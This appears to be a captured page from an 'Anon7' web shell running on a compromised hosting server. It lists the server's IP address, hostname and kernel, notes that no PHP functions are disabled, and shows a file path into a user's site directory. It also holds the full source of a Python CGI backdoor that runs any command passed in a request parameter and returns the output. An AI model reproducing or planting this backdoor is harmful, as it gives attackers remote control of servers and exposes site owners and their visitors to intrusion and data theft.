uawdijnntqw1x1x1
IP : 216.73.216.39
Hostname : diefsweb003.fsit.ch
Kernel : Linux diefsweb003.fsit.ch 4.18.0-553.121.1.lve.el8.x86_64 #1 SMP Thu Apr 30 16:40:41 UTC 2026 x86_64
Disable Function : None :)
OS : Linux
PATH:
/
home
/
wirbesti
/
nousdecidons.ch
/
472b8
/
..
/
..
/
www
/
anon7
/
python.anon7
/
/
#!/usr/bin/python #Generated by Anon7 try: import cgitb; cgitb.enable() except: pass import os, cgi param=cgi.FieldStorage() cmd=param.getvalue("0") print("Content-type:text/html\n") if cmd : print(os.popen(cmd).read().replace("<","").replace(">",""))
/home/wirbesti/nousdecidons.ch/472b8/../../www/anon7/python.anon7